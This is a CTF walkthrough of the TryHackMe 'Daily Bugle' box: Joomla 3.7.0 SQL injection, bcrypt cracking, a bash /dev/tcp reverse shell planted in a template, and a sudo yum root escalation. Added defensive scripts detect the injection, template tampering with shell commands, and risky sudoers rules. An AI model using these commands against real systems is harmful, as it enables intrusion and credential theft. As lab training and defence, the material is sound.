TryHackMe: Daily Bugle CTF

[Enumeration]

  1. Port scan
nmap -Pn <ip>

There are 3 open ports: 22, 80, and 3306.

2. OS and service scan

nmap -A -p 22,80,3306 <ip>

This machine is CentOS.

3. Vuln scan

nmap --script vuln -p 22,80,3306 <ip>

This machine runs Joomla 3.7.0, which has an SQLi vulnerability.

4. Access HTTP site.

There’s news of Spiderman robbing the bank.

Viewing the page source reveals nothing useful.

Following step 3, let’s access /administrator.

5. Search for default credential.

I only have the username “admin” without any password.

6. Search for exploits

searchsploit joomla 3.7.0

There are SQLi and XSS entries.

Read the SQLi entry. It’s CVE-2017–8917 and describes sqlmap usage, but I will search for a Python script instead.

[Exploitation]

  1. After searching with Google, I came across this.

stefanlucas/Exploit-Joomla (github.com): CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0

python joomblah.py http://<ip>

Now I have a username, jonah, and password hash.
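From the defender’s side, the same exploitation step leaves a clear trace in the web server logs. The following Python script is an added example, not part of the original writeup or of the joomblah tool: it parses Apache combined-format access log lines and flags requests to `option=com_fields` whose `list[fullordering]` parameter (the injection point named in the public CVE-2017-8917 advisory) is anything other than a column name followed by ASC or DESC. The log lines are constructed samples, not captures from the box.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format; the request line is split into method, path, protocol.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A legitimate Joomla list ordering is a column reference plus ASC/DESC,
# e.g. "a.ordering ASC". Anything else in this parameter is an anomaly.
BENIGN_ORDERING = re.compile(r"^[A-Za-z_][A-Za-z0-9_.]*\s+(ASC|DESC)$", re.I)

# Constructed sample log lines (not captured from the TryHackMe box).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering%2C%28select+sleep%281%29%29 HTTP/1.1" 500 812 "-" "python-requests/2.22"
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /administrator/ HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict with ip, ts, method, path, status and the decoded query, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["path"])
    rec["uri"] = parts.path
    # parse_qsl URL-decodes keys and values, so list%5Bfullordering%5D becomes list[fullordering].
    rec["query"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return rec


def flag_request(rec):
    """Return a reason string if the request matches the CVE-2017-8917 pattern, else None."""
    q = rec["query"]
    if q.get("option") != "com_fields":
        return None
    value = q.get("list[fullordering]")
    if not value or BENIGN_ORDERING.match(value):
        return None
    return "CVE-2017-8917 pattern: com_fields list[fullordering]=%r" % value


def scan(log_text):
    """Scan raw log text and return one hit dict per suspicious request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reason = flag_request(rec)
        if reason:
            hits.append({"ip": rec["ip"], "ts": rec["ts"],
                         "status": rec["status"], "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

An allowlist on the expected shape of the parameter is deliberately used instead of a blocklist of SQL keywords: it catches encoded and obfuscated variants without needing a signature per payload, and a 500 response on a flagged request is a strong indicator that the injection reached the database layer.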

2. Cracking password

Using the example hashes guide on the hashcat wiki (hashcat.net, example_hashes).

The hash may be bcrypt.

I will use hashcat on Windows for better performance.

Save hash in text file as daily-bugle.txt.

Use hashcat

hashcat.exe -m 3200 daily-bugle.txt rockyou.txt

Now I have a password for Joomla.

3. Login to Joomla

Now I have a dashboard.

4. Reverse shell

I will use this guide to get a reverse shell.

Joomla: Reverse Shell (laptrinhx.com)

Click “Templates”.

Select the first template.

Select index.php

Prepare a listener on port 1234:

nc -lvp 1234

Prepare the reverse shell:

exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'");

Inject the reverse shell.

Click Template review

Now I have a shell.
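The template editor step above is what a Joomla administrator should be watching for: a file in templates/ changed outside of a deployment, and a template file that now calls a shell. The following Python script is an added defensive example (not from the writeup or from Joomla): it records SHA-256 baselines of a template tree, reports which files changed, and scans PHP files for constructs that have no business in a template (shell execution functions, bash /dev/tcp redirection, obfuscated eval, functions named by request input). The template content and the "protostar" directory name are constructed for the demo, and the attacker address in the injected line is a placeholder.

```python
import hashlib
import os
import re
import tempfile

# Constructs that should never appear in a Joomla template's PHP files.
SUSPICIOUS = [
    (re.compile(r"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\("), "shell execution function"),
    (re.compile(r"/dev/tcp/"), "bash network redirection"),
    (re.compile(r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("), "obfuscated eval"),
    (re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*\("), "function call taken from request input"),
]


def file_hashes(root):
    """SHA-256 of every file under root, keyed by path relative to root."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                hashes[os.path.relpath(path, root)] = hashlib.sha256(f.read()).hexdigest()
    return hashes


def changed_files(baseline, current):
    """Files added, removed or modified since the baseline was taken."""
    return sorted(k for k in set(baseline) | set(current) if baseline.get(k) != current.get(k))


def scan_php_file(path):
    """Return one finding per suspicious line in a PHP file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as f:
        for lineno, line in enumerate(f, 1):
            for pattern, reason in SUSPICIOUS:
                if pattern.search(line):
                    findings.append({"file": path, "line": lineno, "reason": reason,
                                     "text": line.strip()[:120]})
    return findings


def scan_tree(root):
    """Scan every .php file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                findings.extend(scan_php_file(os.path.join(dirpath, name)))
    return findings


# Constructed stand-in for a template index.php (not Joomla's real file).
CLEAN_INDEX = """<?php
defined('_JEXEC') or die;
$app = JFactory::getApplication();
?>
<!DOCTYPE html>
<html><body><jdoc:include type="component" /></body></html>
"""

# Same file with the reverse-shell line from the writeup injected; the attacker
# address is a placeholder, not a real host.
TAMPERED_INDEX = CLEAN_INDEX.replace(
    "$app = JFactory::getApplication();",
    "$app = JFactory::getApplication();\n"
    "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP_PLACEHOLDER/1234 0>&1'\");",
)


def demo():
    """Baseline a clean template, tamper with it, and report what the checks catch."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "templates", "protostar")  # assumed template name
        os.makedirs(tpl)
        index_php = os.path.join(tpl, "index.php")
        with open(index_php, "w") as f:
            f.write(CLEAN_INDEX)
        baseline = file_hashes(root)
        clean_findings = scan_tree(root)
        with open(index_php, "w") as f:
            f.write(TAMPERED_INDEX)
        return {
            "clean_findings": len(clean_findings),
            "changed": changed_files(baseline, file_hashes(root)),
            "reasons": sorted({f["reason"] for f in scan_tree(root)}),
        }


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is taken right after deployment and stored off the web host, so an attacker with the Joomla admin panel cannot also rewrite the baseline; the pattern scan is the second net for files that were changed before the baseline existed.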

[Privilege Escalation]

  1. Verify user
id

I’m apache.

2. Normally most CMSs keep credentials in a config file. Let’s grab them in case I need them somewhere else.

ls
cat configuration.php

I have a new credential that I may be able to use somewhere else.

3. Verify users

cat /etc/passwd

This machine has 2 users: root and jjameson.

4. Login as jjameson

Try to log in with the Joomla credential:

su jjameson

Failed!!!

Try to log in with the credential from the config file:

su jjameson
id

Success!!!

5. Verify sudo

There’s yum command.

Following GTFOBins, there are 2 ways of exploiting it.

yum | GTFOBins (gtfobins.github.io)

Let’s try the first set of commands.

Failed!!!

Let’s try these instead.
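The root of this escalation is a sudoers rule that hands a GTFOBins-listed binary to a low-privilege user. The following Python script is an added defensive example, not part of the writeup or of GTFOBins: it parses sudoers user specifications and flags commands that GTFOBins documents as able to spawn a shell or write arbitrary files when run through sudo (yum among them), together with NOPASSWD grants of ALL. The sudoers content is a constructed sample, not the box’s real file.

```python
import os
import re

# Binaries whose GTFOBins sudo entries give a shell or arbitrary file access when
# run as root; yum is the one this box relies on.
SHELL_ESCAPE_BINS = {"yum", "rpm", "vi", "vim", "less", "more", "find", "awk",
                     "python", "perl", "rsync", "tar", "env", "bash", "sh"}

# user  host=(runas) [TAG:] command[, command ...]
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Constructed sudoers sample (not the real /etc/sudoers of the box).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults    requiretty
root    ALL=(ALL)       ALL
%wheel  ALL=(ALL)       ALL
jjameson ALL=(ALL) NOPASSWD: /usr/bin/yum
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
deploy   ALL=(ALL) /usr/bin/systemctl restart httpd
"""


def audit_sudoers(text):
    """Return a finding dict for every rule that effectively grants a root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue                              # aliases and other directives are ignored here
        who = m.group("who")
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if cmd == "ALL":
                if nopasswd:
                    findings.append({"who": who, "cmd": cmd, "nopasswd": True,
                                     "reason": "passwordless sudo to any command"})
                continue
            exe = os.path.basename(cmd.split()[0])
            if exe in SHELL_ESCAPE_BINS:
                findings.append({"who": who, "cmd": cmd, "nopasswd": nopasswd,
                                 "reason": f"{exe} can spawn a shell or write files as root (GTFOBins)"})
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print(finding)
```

For the yum entry the fix is to remove it; if package updates really must be delegated, hand them to an unprivileged update job or configuration management rather than to an interactive package manager that loads plugins.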

6. Read user.txt

Now I’m root. Let’s get the answers for this box.

cd /home/jjameson
ls
cat user.txt

cd /root
ls
cat root.txt
